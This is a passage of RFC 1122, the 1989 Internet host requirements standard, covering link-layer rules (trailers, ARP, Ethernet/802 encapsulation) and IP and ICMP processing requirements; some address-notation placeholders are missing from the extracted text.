Borman (Cray Research), Noel Chiappa, Dave Crocker (DEC), Steve
Deering (Stanford), Mike Karels (Berkeley), Phil Karn (Bellcore),
John Lekashman (NASA), Charles Lynn (BBN), Keith McCloghrie (TWG),
Paul Mockapetris (ISI), Thomas Narten (Purdue), Craig Partridge
(BBN), Drew Perkins (CMU), and James Van Bokkelen (FTP Software).

In addition, the following people made major contributions to the
effort: Bill Barns (Mitre), Steve Bellovin (AT&T), Mike Brescia
(BBN), Ed Cain (DCA), Annette DeSchon (ISI), Martin Gross (DCA),
Phill Gross (NRI), Charles Hedrick (Rutgers), Van Jacobson (LBL),
John Klensin (MIT), Mark Lottor (SRI), Milo Medin (NASA), Bill
Melohn (Sun Microsystems), Greg Minshall (Kinetics), Jeff Mogul
(DEC), John Mullen (CMC), Jon Postel (ISI), John Romkey (Epilogue
Technology), and Mike StJohns (DCA). The following also made
significant contributions to particular areas: Eric Allman
(Berkeley), Rob Austein (MIT), Art Berggreen (ACC), Keith Bostic
(Berkeley), Vint Cerf (NRI), Wayne Hathaway (NASA), Matt Korn
(IBM), Erik Naggum (Naggum Software, Norway), Robert Ullmann
(Prime Computer), David Waitzman (BBN), Frank Wancho (USA), Arun
Welch (Ohio State), Bill Westfield (Cisco), and Rayan Zachariassen
(Toronto).

We are grateful to all, including any contributors who may have
been inadvertently omitted from this list.

RFC1122 LINK LAYER October 1989

2. LINK LAYER

2.1 INTRODUCTION

All Internet systems, both hosts and gateways, have the same
requirements for link layer protocols. These requirements are
given in Chapter 3 of "Requirements for Internet Gateways"
[INTRO:2], augmented with the material in this section.

2.2 PROTOCOL WALK-THROUGH

None.

2.3 SPECIFIC ISSUES

2.3.1 Trailer Protocol Negotiation

The trailer protocol [LINK:1] for link-layer encapsulation MAY
be used, but only when it has been verified that both systems
(host or gateway) involved in the link-layer communication
implement trailers. If the system does not dynamically
negotiate use of the trailer protocol on a per-destination
basis, the default configuration MUST disable the protocol.

DISCUSSION:
The trailer protocol is a link-layer encapsulation
technique that rearranges the data contents of packets
sent on the physical network. In some cases, trailers
improve the throughput of higher layer protocols by
reducing the amount of data copying within the operating
system. Higher layer protocols are unaware of trailer
use, but both the sending and receiving host MUST
understand the protocol if it is used.

Improper use of trailers can result in very confusing
symptoms. Only packets with specific size attributes are
encapsulated using trailers, and typically only a small
fraction of the packets being exchanged have these
attributes. Thus, if a system using trailers exchanges
packets with a system that does not, some packets
disappear into a black hole while others are delivered
successfully.

IMPLEMENTATION:
On an Ethernet, packets encapsulated with trailers use a
distinct Ethernet type [LINK:1], and trailer negotiation
is performed at the time that ARP is used to discover the
link-layer address of a destination system.

RFC1122 LINK LAYER October 1989

Specifically, the ARP exchange is completed in the usual
manner using the normal IP protocol type, but a host that
wants to speak trailers will send an additional "trailer
ARP reply" packet, i.e., an ARP reply that specifies the
trailer encapsulation protocol type but otherwise has the
format of a normal ARP reply. If a host configured to use
trailers receives a trailer ARP reply message from a
remote machine, it can add that machine to the list of
machines that understand trailers, e.g., by marking the
corresponding entry in the ARP cache.

Hosts wishing to receive trailer encapsulations send
trailer ARP replies whenever they complete exchanges of
normal ARP messages for IP. Thus, a host that received an
ARP request for its IP protocol address would send a
trailer ARP reply in addition to the normal IP ARP reply;
a host that sent the IP ARP request would send a trailer
ARP reply when it received the corresponding IP ARP reply.
In this way, either the requesting or responding host in
an IP ARP exchange may request that it receive trailer
encapsulations.

This scheme, using extra trailer ARP reply packets rather
than sending an ARP request for the trailer protocol type,
was designed to avoid a continuous exchange of ARP packets
with a misbehaving host that, contrary to any
specification or common sense, responded to an ARP reply
for trailers with another ARP reply for IP. This problem
is avoided by sending a trailer ARP reply in response to
an IP ARP reply only when the IP ARP reply answers an
outstanding request; this is true when the hardware
address for the host is still unknown when the IP ARP
reply is received. A trailer ARP reply may always be sent
along with an IP ARP reply responding to an IP ARP
request.

2.3.2 Address Resolution Protocol -- ARP

2.3.2.1 ARP Cache Validation

An implementation of the Address Resolution Protocol (ARP)
[LINK:2] MUST provide a mechanism to flush out-of-date cache
entries. If this mechanism involves a timeout, it SHOULD be
possible to configure the timeout value.

A mechanism to prevent ARP flooding (repeatedly sending an
ARP Request for the same IP address, at a high rate) MUST be
included. The recommended maximum rate is 1 per second per

RFC1122 LINK LAYER October 1989

destination.

DISCUSSION:
The ARP specification [LINK:2] suggests but does not
require a timeout mechanism to invalidate cache entries
when hosts change their Ethernet addresses. The
prevalence of proxy ARP (see Section 2.4 of [INTRO:2])
has significantly increased the likelihood that cache
entries in hosts will become invalid, and therefore
some ARP-cache invalidation mechanism is now required
for hosts. Even in the absence of proxy ARP, a long-
period cache timeout is useful in order to
automatically correct any bad ARP data that might have
been cached.

IMPLEMENTATION:
Four mechanisms have been used, sometimes in
combination, to flush out-of-date cache entries.

(1) Timeout -- Periodically time out cache entries,
even if they are in use. Note that this timeout
should be restarted when the cache entry is
"refreshed" (by observing the source fields,
regardless of target address, of an ARP broadcast
from the system in question). For proxy ARP
situations, the timeout needs to be on the order
of a minute.

(2) Unicast Poll -- Actively poll the remote host by
periodically sending a point-to-point ARP Request
to it, and delete the entry if no ARP Reply is
received from N successive polls. Again, the
timeout should be on the order of a minute, and
typically N is 2.

(3) Link-Layer Advice -- If the link-layer driver
detects a delivery problem, flush the
corresponding ARP cache entry.

(4) Higher-layer Advice -- Provide a call from the
Internet layer to the link layer to indicate a
delivery problem. The effect of this call would
be to invalidate the corresponding cache entry.
This call would be analogous to the
"ADVISE_DELIVPROB()" call from the transport layer
to the Internet layer (see Section 3.4), and in
fact the ADVISE_DELIVPROB routine might in turn
call the link-layer advice routine to invalidate

RFC1122 LINK LAYER October 1989

the ARP cache entry.

Approaches (1) and (2) involve ARP cache timeouts on
the order of a minute or less. In the absence of proxy
ARP, a timeout this short could create noticeable
overhead traffic on a very large Ethernet. Therefore,
it may be necessary to configure a host to lengthen the
ARP cache timeout.

2.3.2.2 ARP Packet Queue

The link layer SHOULD save (rather than discard) at least
one (the latest) packet of each set of packets destined to
the same unresolved IP address, and transmit the saved
packet when the address has been resolved.

DISCUSSION:
Failure to follow this recommendation causes the first
packet of every exchange to be lost. Although higher-
layer protocols can generally cope with packet loss by
retransmission, packet loss does impact performance.
For example, loss of a TCP open request causes the
initial round-trip time estimate to be inflated. UDP-
based applications such as the Domain Name System are
more seriously affected.

2.3.3 Ethernet and IEEE 802 Encapsulation

The IP encapsulation for Ethernets is described in RFC-894
[LINK:3], while RFC-1042 [LINK:4] describes the IP
encapsulation for IEEE 802 networks. RFC-1042 elaborates and
replaces the discussion in Section 3.4 of [INTRO:2].

Every Internet host connected to a 10Mbps Ethernet cable:

o MUST be able to send and receive packets using RFC-894
encapsulation;

o SHOULD be able to receive RFC-1042 packets, intermixed
with RFC-894 packets; and

o MAY be able to send packets using RFC-1042 encapsulation.

An Internet host that implements sending both the RFC-894 and
the RFC-1042 encapsulations MUST provide a configuration switch
to select which is sent, and this switch MUST default to RFC-
894.

RFC1122 LINK LAYER October 1989

Note that the standard IP encapsulation in RFC-1042 does not
use the protocol id value (K1=6) that IEEE reserved for IP;
instead, it uses a value (K1=170) that implies an extension
(the "SNAP") which can be used to hold the Ether-Type field.
An Internet system MUST NOT send 802 packets using K1=6.

Address translation from Internet addresses to link-layer
addresses on Ethernet and IEEE 802 networks MUST be managed by
the Address Resolution Protocol (ARP).

The MTU for an Ethernet is 1500 and for 802.3 is 1492.

DISCUSSION:
The IEEE 802.3 specification provides for operation over a
10Mbps Ethernet cable, in which case Ethernet and IEEE
802.3 frames can be physically intermixed. A receiver can
distinguish Ethernet and 802.3 frames by the value of the
802.3 Length field; this two-octet field coincides in the
header with the Ether-Type field of an Ethernet frame. In
particular, the 802.3 Length field must be less than or
equal to 1500, while all valid Ether-Type values are
greater than 1500.

Another compatibility problem arises with link-layer
broadcasts. A broadcast sent with one framing will not be
seen by hosts that can receive only the other framing.

The provisions of this section were designed to provide
direct interoperation between 894-capable and 1042-capable
systems on the same cable, to the maximum extent possible.
It is intended to support the present situation where
894-only systems predominate, while providing an easy
transition to a possible future in which 1042-capable
systems become common.

Note that 894-only systems cannot interoperate directly
with 1042-only systems. If the two system types are set
up as two different logical networks on the same cable,
they can communicate only through an IP gateway.
Furthermore, it is not useful or even possible for a
dual-format host to discover automatically which format to
send, because of the problem of link-layer broadcasts.

2.4 LINK/INTERNET LAYER INTERFACE

The packet receive interface between the IP layer and the link
layer MUST include a flag to indicate whether the incoming packet
was addressed to a link-layer broadcast address.

RFC1122 LINK LAYER October 1989

DISCUSSION
Although the IP layer does not generally know link layer
addresses (since every different network medium typically has
a different address format), the broadcast address on a
broadcast-capable medium is an important special case. See
Section 3.2.2, especially the DISCUSSION concerning broadcast
storms.

The packet send interface between the IP and link layers MUST
include the 5-bit TOS field (see Section 3.2.1.6).

The link layer MUST NOT report a Destination Unreachable error to
IP solely because there is no ARP cache entry for a destination.

2.5 LINK LAYER REQUIREMENTS SUMMARY

| | | | |S| |
| | | | |H| |F
| | | | |O|M|o
| | |S| |U|U|o
| | |H| |L|S|t
| |M|O| |D|T|n
| |U|U|M| | |o
| |S|L|A|N|N|t
| |T|D|Y|O|O|t
FEATURE |SECTION| | | |T|T|e
--------------------------------------------------|-------|-|-|-|-|-|--
| | | | | | |
Trailer encapsulation |2.3.1 | | |x| | |
Send Trailers by default without negotiation |2.3.1 | | | | |x|
ARP |2.3.2 | | | | | |
Flush out-of-date ARP cache entries |2.3.2.1|x| | | | |
Prevent ARP floods |2.3.2.1|x| | | | |
Cache timeout configurable |2.3.2.1| |x| | | |
Save at least one (latest) unresolved pkt |2.3.2.2| |x| | | |
Ethernet and IEEE 802 Encapsulation |2.3.3 | | | | | |
Host able to: |2.3.3 | | | | | |
Send & receive RFC-894 encapsulation |2.3.3 |x| | | | |
Receive RFC-1042 encapsulation |2.3.3 | |x| | | |
Send RFC-1042 encapsulation |2.3.3 | | |x| | |
Then config. sw. to select, RFC-894 dflt |2.3.3 |x| | | | |
Send K1=6 encapsulation |2.3.3 | | | | |x|
Use ARP on Ethernet and IEEE 802 nets |2.3.3 |x| | | | |
Link layer report b'casts to IP layer |2.4 |x| | | | |
IP layer pass TOS to link layer |2.4 |x| | | | |
No ARP cache entry treated as Dest. Unreach. |2.4 | | | | |x|

RFC1122 INTERNET LAYER October 1989

3. INTERNET LAYER PROTOCOLS

3.1 INTRODUCTION

The Robustness Principle: "Be liberal in what you accept, and
conservative in what you send" is particularly important in the
Internet layer, where one misbehaving host can deny Internet
service to many other hosts.

The protocol standards used in the Internet layer are:

o RFC-791 [IP:1] defines the IP protocol and gives an
introduction to the architecture of the Internet.

o RFC-792 [IP:2] defines ICMP, which provides routing,
diagnostic and error functionality for IP. Although ICMP
messages are encapsulated within IP datagrams, ICMP
processing is considered to be (and is typically implemented
as) part of the IP layer. See Section 3.2.2.

o RFC-950 [IP:3] defines the mandatory subnet extension to the
addressing architecture.

o RFC-1112 [IP:4] defines the Internet Group Management
Protocol IGMP, as part of a recommended extension to hosts
and to the host-gateway interface to support Internet-wide
multicasting at the IP level. See Section 3.2.3.

The target of an IP multicast may be an arbitrary group of
Internet hosts. IP multicasting is designed as a natural
extension of the link-layer multicasting facilities of some
networks, and it provides a standard means for local access
to such link-layer multicasting facilities.

Other important references are listed in Section 5 of this
document.

The Internet layer of host software MUST implement both IP and
ICMP. See Section 3.3.7 for the requirements on support of IGMP.

The host IP layer has two basic functions: (1) choose the "next
hop" gateway or host for outgoing IP datagrams and (2) reassemble
incoming IP datagrams. The IP layer may also (3) implement
intentional fragmentation of outgoing datagrams. Finally, the IP
layer must (4) provide diagnostic and error functionality. We
expect that IP layer functions may increase somewhat in the
future, as further Internet control and management facilities are
developed.

RFC1122 INTERNET LAYER October 1989

For normal datagrams, the processing is straightforward. For
incoming datagrams, the IP layer:

(1) verifies that the datagram is correctly formatted;

(2) verifies that it is destined to the local host;

(3) processes options;

(4) reassembles the datagram if necessary; and

(5) passes the encapsulated message to the appropriate
transport-layer protocol module.

For outgoing datagrams, the IP layer:

(1) sets any fields not set by the transport layer;

(2) selects the correct first hop on the connected network (a
process called "routing");

(3) fragments the datagram if necessary and if intentional
fragmentation is implemented (see Section 3.3.3); and

(4) passes the packet(s) to the appropriate link-layer driver.

A host is said to be multihomed if it has multiple IP addresses.
Multihoming introduces considerable confusion and complexity into
the protocol suite, and it is an area in which the Internet
architecture falls seriously short of solving all problems. There
are two distinct problem areas in multihoming:

(1) Local multihoming -- the host itself is multihomed; or

(2) Remote multihoming -- the local host needs to communicate
with a remote multihomed host.

At present, remote multihoming MUST be handled at the application
layer, as discussed in the companion RFC [INTRO:1]. A host MAY
support local multihoming, which is discussed in this document,
and in particular in Section 3.3.4.

Any host that forwards datagrams generated by another host is
acting as a gateway and MUST also meet the specifications laid out
in the gateway requirements RFC [INTRO:2]. An Internet host that
includes embedded gateway code MUST have a configuration switch to
disable the gateway function, and this switch MUST default to the

RFC1122 INTERNET LAYER October 1989

non-gateway mode. In this mode, a datagram arriving through one
interface will not be forwarded to another host or gateway (unless
it is source-routed), regardless of whether the host is single-
homed or multihomed. The host software MUST NOT automatically
move into gateway mode if the host has more than one interface, as
the operator of the machine may neither want to provide that
service nor be competent to do so.

In the following, the action specified in certain cases is to
"silently discard" a received datagram. This means that the
datagram will be discarded without further processing and that the
host will not send any ICMP error message (see Section 3.2.2) as a
result. However, for diagnosis of problems a host SHOULD provide
the capability of logging the error (see Section 1.2.3), including
the contents of the silently-discarded datagram, and SHOULD record
the event in a statistics counter.

DISCUSSION:
Silent discard of erroneous datagrams is generally intended
to prevent "broadcast storms".

3.2 PROTOCOL WALK-THROUGH

3.2.1 Internet Protocol -- IP

3.2.1.1 Version Number: RFC-791 Section 3.1

A datagram whose version number is not 4 MUST be silently
discarded.

3.2.1.2 Checksum: RFC-791 Section 3.1

A host MUST verify the IP header checksum on every received
datagram and silently discard every datagram that has a bad
checksum.

3.2.1.3 Addressing: RFC-791 Section 3.2

There are now five classes of IP addresses: Class A through
Class E. Class D addresses are used for IP multicasting
[IP:4], while Class E addresses are reserved for
experimental use.

A multicast (Class D) address is a 28-bit logical address
that stands for a group of hosts, and may be either
permanent or transient. Permanent multicast addresses are
allocated by the Internet Assigned Number Authority
[INTRO:6], while transient addresses may be allocated

RFC1122 INTERNET LAYER October 1989

dynamically to transient groups. Group membership is
determined dynamically using IGMP [IP:4].

We now summarize the important special cases for Class A, B,
and C IP addresses, using the following notation for an IP
address:

{ , }

or
{ , , }

and the notation "-1" for a field that contains all 1 bits.
This notation is not intended to imply that the 1-bits in an
address mask need be contiguous.

(a) { 0, 0 }

This host on this network. MUST NOT be sent, except as
a source address as part of an initialization procedure
by which the host learns its own IP address.

See also Section 3.3.6 for a non-standard use of {0,0}.

(b) { 0, }

Specified host on this network. It MUST NOT be sent,
except as a source address as part of an initialization
procedure by which the host learns its full IP address.

(c) { -1, -1 }

Limited broadcast. It MUST NOT be used as a source
address.

A datagram with this destination address will be
received by every host on the connected physical
network but will not be forwarded outside that network.

(d) { , -1 }

Directed broadcast to the specified network. It MUST
NOT be used as a source address.

(e) { , , -1 }

Directed broadcast to the specified subnet. It MUST
NOT be used as a source address.

RFC1122 INTERNET LAYER October 1989

(f) { , -1, -1 }

Directed broadcast to all subnets of the specified
subnetted network. It MUST NOT be used as a source
address.

(g) { 127, }

Internal host loopback address. Addresses of this form
MUST NOT appear outside a host.

The is administratively assigned so that
its value will be unique in the entire world.

IP addresses are not permitted to have the value 0 or -1 for
any of the , , or number> fields (except in the special cases listed above).
This implies that each of these fields will be at least two
bits long.

For further discussion of broadcast addresses, see Section
3.3.6.

A host MUST support the subnet extensions to IP [IP:3]. As
a result, there will be an address mask of the form:
{-1, -1, 0} associated with each of the host's local IP
addresses; see Sections 3.2.2.9 and 3.3.1.1.

When a host sends any datagram, the IP source address MUST
be one of its own IP addresses (but not a broadcast or
multicast address).

A host MUST silently discard an incoming datagram that is
not destined for the host. An incoming datagram is destined
for the host if the datagram's destination address field is:

(1) (one of) the host's IP address(es); or

(2) an IP broadcast address valid for the connected
network; or

(3) the address for a multicast group of which the host is
a member on the incoming physical interface.

For most purposes, a datagram addressed to a broadcast or
multicast destination is processed as if it had been
addressed to one of the host's IP addresses; we use the term
"specific-destination address" for the equivalent local IP

RFC1122 INTERNET LAYER October 1989

address of the host. The specific-destination address is
defined to be the destination address in the IP header
unless the header contains a broadcast or multicast address,
in which case the specific-destination is an IP address
assigned to the physical interface on which the datagram
arrived.

A host MUST silently discard an incoming datagram containing
an IP source address that is invalid by the rules of this
section. This validation could be done in either the IP
layer or by each protocol in the transport layer.

DISCUSSION:
A mis-addressed datagram might be caused by a link-
layer broadcast of a unicast datagram or by a gateway
or host that is confused or mis-configured.

An architectural goal for Internet hosts was to allow
IP addresses to be featureless 32-bit numbers, avoiding
algorithms that required a knowledge of the IP address
format. Otherwise, any future change in the format or
interpretation of IP addresses will require host
software changes. However, validation of broadcast and
multicast addresses violates this goal; a few other
violations are described elsewhere in this document.

Implementers should be aware that applications
depending upon the all-subnets directed broadcast
address (f) may be unusable on some networks. All-
subnets broadcast is not widely implemented in vendor
gateways at present, and even when it is implemented, a
particular network administration may disable it in the
gateway configuration.

3.2.1.4 Fragmentation and Reassembly: RFC-791 Section 3.2

The Internet model requires that every host support
reassembly. See Sections 3.3.2 and 3.3.3 for the
requirements on fragmentation and reassembly.

3.2.1.5 Identification: RFC-791 Section 3.2

When sending an identical copy of an earlier datagram, a
host MAY optionally retain the same Identification field in
the copy.

RFC1122 INTERNET LAYER October 1989

DISCUSSION:
Some Internet protocol experts have maintained that
when a host sends an identical copy of an earlier
datagram, the new copy should contain the same
Identification value as the original. There are two
suggested advantages: (1) if the datagrams are
fragmented and some of the fragments are lost, the
receiver may be able to reconstruct a complete datagram
from fragments of the original and the copies; (2) a
congested gateway might use the IP Identification field
(and Fragment Offset) to discard duplicate datagrams
from the queue.

However, the observed patterns of datagram loss in the
Internet do not favor the probability of retransmitted
fragments filling reassembly gaps, while other
mechanisms (e.g., TCP repacketizing upon
retransmission) tend to prevent retransmission of an
identical datagram [IP:9]. Therefore, we believe that
retransmitting the same Identification field is not
useful. Also, a connectionless transport protocol like
UDP would require the cooperation of the application
programs to retain the same Identification value in
identical datagrams.

3.2.1.6 Type-of-Service: RFC-791 Section 3.2

The "Type-of-Service" byte in the IP header is divided into
two sections: the Precedence field (high-order 3 bits), and
a field that is customarily called "Type-of-Service" or
"TOS" (low-order 5 bits). In this document, all references
to "TOS" or the "TOS field" refer to the low-order 5 bits
only.

The Precedence field is intended for Department of Defense
applications of the Internet protocols. The use of non-zero
values in this field is outside the scope of this document
and the IP standard specification. Vendors should consult
the Defense Communication Agency (DCA) for guidance on the
IP Precedence field and its implications for other protocol
layers. However, vendors should note that the use of
precedence will most likely require that its value be passed
between protocol layers in just the same way as the TOS
field is passed.

The IP layer MUST provide a means for the transport layer to
set the TOS field of every datagram that is sent; the
default is all zero bits. The IP layer SHOULD pass received

RFC1122 INTERNET LAYER October 1989

TOS values up to the transport layer.

The particular link-layer mappings of TOS contained in RFC-
795 SHOULD NOT be implemented.

DISCUSSION:
While the TOS field has been little used in the past,
it is expected to play an increasing role in the near
future. The TOS field is expected to be used to
control two aspects of gateway operations: routing and
queueing algorithms. See Section 2 of [INTRO:1] for
the requirements on application programs to specify TOS
values.

The TOS field may also be mapped into link-layer
service selectors. This has been applied to provide
effective sharing of serial lines by different classes
of TCP traffic, for example. However, the mappings
suggested in RFC-795 for networks that were included in
the Internet as of 1981 are now obsolete.

3.2.1.7 Time-to-Live: RFC-791 Section 3.2

A host MUST NOT send a datagram with a Time-to-Live (TTL)
value of zero.

A host MUST NOT discard a datagram just because it was
received with TTL less than 2.

The IP layer MUST provide a means for the transport layer to
set the TTL field of every datagram that is sent. When a
fixed TTL value is used, it MUST be configurable. The
current suggested value will be published in the "Assigned
Numbers" RFC.

DISCUSSION:
The TTL field has two functions: limit the lifetime of
TCP segments (see RFC-793 [TCP:1], p. 28), and
terminate Internet routing loops. Although TTL is a
time in seconds, it also has some attributes of a hop-
count, since each gateway is required to reduce the TTL
field by at least one.

The intent is that TTL expiration will cause a datagram
to be discarded by a gateway but not by the destination
host; however, hosts that act as gateways by forwarding
datagrams must follow the gateway rules for TTL.

RFC1122 INTERNET LAYER October 1989

A higher-layer protocol may want to set the TTL in
order to implement an "expanding scope" search for some
Internet resource. This is used by some diagnostic
tools, and is expected to be useful for locating the
"nearest" server of a given class using IP
multicasting, for example. A particular transport
protocol may also want to specify its own TTL bound on
maximum datagram lifetime.

A fixed value must be at least big enough for the
Internet "diameter," i.e., the longest possible path.
A reasonable value is about twice the diameter, to
allow for continued Internet growth.

3.2.1.8 Options: RFC-791 Section 3.2

There MUST be a means for the transport layer to specify IP
options to be included in transmitted IP datagrams (see
Section 3.4).

All IP options (except NOP or END-OF-LIST) received in
datagrams MUST be passed to the transport layer (or to ICMP
processing when the datagram is an ICMP message). The IP
and transport layer MUST each interpret those IP options
that they understand and silently ignore the others.

Later sections of this document discuss specific IP option
support required by each of ICMP, TCP, and UDP.

DISCUSSION:
Passing all received IP options to the transport layer
is a deliberate "violation of strict layering" that is
designed to ease the introduction of new transport-
relevant IP options in the future. Each layer must
pick out any options that are relevant to its own
processing and ignore the rest. For this purpose,
every IP option except NOP and END-OF-LIST will include
a specification of its own length.

This document does not define the order in which a
receiver must process multiple options in the same IP
header. Hosts sending multiple options must be aware
that this introduces an ambiguity in the meaning of
certain options when combined with a source-route
option.

IMPLEMENTATION:
The IP layer must not crash as the result of an option

RFC1122 INTERNET LAYER October 1989

length that is outside the possible range. For
example, erroneous option lengths have been observed to
put some IP implementations into infinite loops.

Here are the requirements for specific IP options:

(a) Security Option

Some environments require the Security option in every
datagram; such a requirement is outside the scope of
this document and the IP standard specification. Note,
however, that the security options described in RFC-791
and RFC-1038 are obsolete. For DoD applications,
vendors should consult [IP:8] for guidance.

(b) Stream Identifier Option

This option is obsolete; it SHOULD NOT be sent, and it
MUST be silently ignored if received.

(c) Source Route Options

A host MUST support originating a source route and MUST
be able to act as the final destination of a source
route.

If host receives a datagram containing a completed
source route (i.e., the pointer points beyond the last
field), the datagram has reached its final destination;
the option as received (the recorded route) MUST be
passed up to the transport layer (or to ICMP message
processing). This recorded route will be reversed and
used to form a return source route for reply datagrams
(see discussion of IP Options in Section 4). When a
return source route is built, it MUST be correctly
formed even if the recorded route included the source
host (see case (B) in the discussion below).

An IP header containing more than one Source Route
option MUST NOT be sent; the effect on routing of
multiple Source Route options is implementation-
specific.

Section 3.3.5 presents the rules for a host acting as
an intermediate hop in a source route, i.e., forwarding

RFC1122 INTERNET LAYER October 1989

a source-routed datagram.

DISCUSSION:
If a source-routed datagram is fragmented, each
fragment will contain a copy of the source route.
Since the processing of IP options (including a
source route) must precede reassembly, the
original datagram will not be reassembled until
the final destination is reached.

Suppose a source routed datagram is to be routed
from host S to host D via gateways G1, G2, ... Gn.
There was an ambiguity in the specification over
whether the source route option in a datagram sent
out by S should be (A) or (B):

(A): {>>G2, G3, ... Gn, D} <--- CORRECT

(B): {S, >>G2, G3, ... Gn, D} <---- WRONG

(where >> represents the pointer). If (A) is
sent, the datagram received at D will contain the
option: {G1, G2, ... Gn >>}, with S and D as the
IP source and destination addresses. If (B) were
sent, the datagram received at D would again
contain S and D as the same IP source and
destination addresses, but the option would be:
{S, G1, ...Gn >>}; i.e., the originating host
would be the first hop in the route.

(d) Record Route Option

Implementation of originating and processing the Record
Route option is OPTIONAL.

(e) Timestamp Option

Implementation of originating and processing the
Timestamp option is OPTIONAL. If it is implemented,
the following rules apply:

o The originating host MUST record a timestamp in a
Timestamp option whose Internet address fields are
not pre-specified or whose first pre-specified
address is the host's interface address.

RFC1122 INTERNET LAYER October 1989

o The destination host MUST (if possible) add the
current timestamp to a Timestamp option before
passing the option to the transport layer or to
ICMP for processing.

o A timestamp value MUST follow the rules given in
Section 3.2.2.8 for the ICMP Timestamp message.

3.2.2 Internet Control Message Protocol -- ICMP

ICMP messages are grouped into two classes.

*
ICMP error messages:

Destination Unreachable (see Section 3.2.2.1)
Redirect (see Section 3.2.2.2)
Source Quench (see Section 3.2.2.3)
Time Exceeded (see Section 3.2.2.4)
Parameter Problem (see Section 3.2.2.5)

*
ICMP query messages:

Echo (see Section 3.2.2.6)
Information (see Section 3.2.2.7)
Timestamp (see Section 3.2.2.8)
Address Mask (see Section 3.2.2.9)

If an ICMP message of unknown type is received, it MUST be
silently discarded.

Every ICMP error message includes the Internet header and at
least the first 8 data octets of the datagram that triggered
the error; more than 8 octets MAY be sent; this header and data
MUST be unchanged from the received datagram.

In those cases where the Internet layer is required to pass an
ICMP error message to the transport layer, the IP protocol
number MUST be extracted from the original header and used to
select the appropriate transport protocol entity to handle the
error.

An ICMP error message SHOULD be sent with normal (i.e., zero)
TOS bits.

RFC1122 INTERNET LAYER October 1989

An ICMP error message MUST NOT be sent as the result of
receiving:

* an ICMP error message, or

* a datagram destined to an IP broadcast or IP multicast
address, or

* a datagram sent as a link-layer broadcast, or

* a non-initial fragment, or

* a datagram whose source address does not define a single
host -- e.g., a zero address, a loopback address, a
broadcast address, a multicast address, or a Class E
address.

NOTE: THESE RESTRICTIONS TAKE PRECEDENCE OVER ANY REQUIREMENT
ELSEWHERE IN THIS DOCUMENT FOR SENDING ICMP ERROR MESSAGES.

DISCUSSION:
These rules will prevent the "broadcast storms" that have
resulted from hosts returning ICMP error messages in
response to broadcast datagrams. For example, a broadcast
UDP segment to a non-existent port could trigger a flood
of ICMP Destination Unreachable datagrams from all
machines that do not have a client for that destination
port. On a large Ethernet, the resulting collisions can
render the network useless for a second or more.

Every datagram that is broadcast on the connected network
should have a valid IP broadcast address as its IP
destination (see Section 3.3.6). However, some hosts
violate this rule. To be certain to detect broadcast
datagrams, therefore, hosts are required to check for a
link-layer broadcast as well as an IP-layer broadcast
address.

IMPLEMENTATION:
This requires that the link layer inform the IP layer when
a link-layer broadcast datagram has been received; see
Section 2.4.

3.2.2.1 Destination Unreachable: RFC-792

The following additional codes are hereby defined:

6 = destination network unknown

RFC1122 INTERNET LAYER October 1989

7 = destination host unknown

8 = source host isolated

9 = communication with destination network
administratively prohibited

10 = communication with destination host
administratively prohibited

11 = network unreachable for type of service

12 = host unreachable for type of service

A host SHOULD generate Destination Unreachable messages with
code:

2 (Protocol Unreachable), when the designated transport
protocol is not supported; or

3 (Port Unreachable), when the designated transport
protocol (e.g., UDP) is unable to demultiplex the
datagram but has no protocol mechanism to inform the
sender.

A Destination Unreachable message that is received MUST be
reported to the transport layer. The transport layer SHOULD
use the information appropriately; for example, see Sections
4.1.3.3, 4.2.3.9, and 4.2.4 below. A transport protocol
that has its own mechanism for notifying the sender that a
port is unreachable (e.g., TCP, which sends RST segments)
MUST nevertheless accept an ICMP Port Unreachable for the
same purpose.

A Destination Unreachable message that is received with code
0 (Net), 1 (Host), or 5 (Bad Source Route) may result from a
routing transient and MUST therefore be interpreted as only
a hint, not proof, that the specified destination is
unreachable [IP:11]. For example, it MUST NOT be used as
proof of a dead gateway (see Section 3.3.1).

3.2.2.2 Redirect: RFC-792

A host SHOULD NOT send an ICMP Redirect message; Redirects
are to be sent only by gateways.

A host receiving a Redirect message MUST update its routing
information accordingly. Every host MUST be prepared to

RFC1122 INTERNET LAYER October 1989

accept both Host and Network Redirects and to process them
as described in Section 3.3.1.2 below.

A Redirect message SHOULD be silently discarded if the new
gateway address it specifies is not on the same connected
(sub-) net through which the Redirect arrived [INTRO:2,
Appendix A], or if the source of the Redirect is not the
current first-hop gateway for the specified destination (see
Section 3.3.1).

3.2.2.3 Source Quench: RFC-792

A host MAY send a Source Quench message if it is
approaching, or has reached, the point at which it is forced
to discard incoming datagrams due to a shortage of
reassembly buffers or other resources. See Section 2.2.3 of
[INTRO:2] for suggestions on when to send Source Quench.

If a Source Quench message is received, the IP layer MUST
report it to the transport layer (or ICMP processing). In
general, the transport or application layer SHOULD implement
a mechanism to respond to Source Quench for any protocol
that can send a sequence of datagrams to the same
destination and which can reasonably be expected to maintain
enough state information to make this feasible. See Section
4 for the handling of Source Quench by TCP and UDP.

DISCUSSION:
A Source Quench may be generated by the target host or
by some gateway in the path of a datagram. The host
receiving a Source Quench should throttle itself back
for a period of time, then gradually increase the
transmission rate again. The mechanism to respond to
Source Quench may be in the transport layer (for
connection-oriented protocols like TCP) or in the
application layer (for protocols that are built on top
of UDP).

A mechanism has been proposed [IP:14] to make the IP
layer respond directly to Source Quench by controlling
the rate at which datagrams are sent, however, this
proposal is currently experimental and not currently
recommended.

3.2.2.4 Time Exceeded: RFC-792

An incoming Time Exceeded message MUST be passed to the
transport layer.

RFC1122 INTERNET LAYER October 1989

DISCUSSION:
A gateway will send a Time Exceeded Code 0 (In Transit)
message when it discards a datagram due to an expired
TTL field. This indicates either a gateway routing
loop or too small an initial TTL value.

A host may receive a Time Exceeded Code 1 (Reassembly
Timeout) message from a destination host that has timed
out and discarded an incomplete datagram; see Section
3.3.2 below. In the future, receipt of this message
might be part of some "MTU discovery" procedure, to
discover the maximum datagram size that can be sent on
the path without fragmentation.

3.2.2.5 Parameter Problem: RFC-792

A host SHOULD generate Parameter Problem messages. An
incoming Parameter Problem message MUST be passed to the
transport layer, and it MAY be reported to the user.

DISCUSSION:
The ICMP Parameter Problem message is sent to the
source host for any problem not specifically covered by
another ICMP message. Receipt of a Parameter Problem
message generally indicates some local or remote
implementation error.

A new variant on the Parameter Problem message is hereby
defined:
Code 1 = required option is missing.

DISCUSSION:
This variant is currently in use in the military
community for a missing security option.

3.2.2.6 Echo Request/Reply: RFC-792

Every host MUST implement an ICMP Echo server function that
receives Echo Requests and sends corresponding Echo Replies.
A host SHOULD also implement an application-layer interface
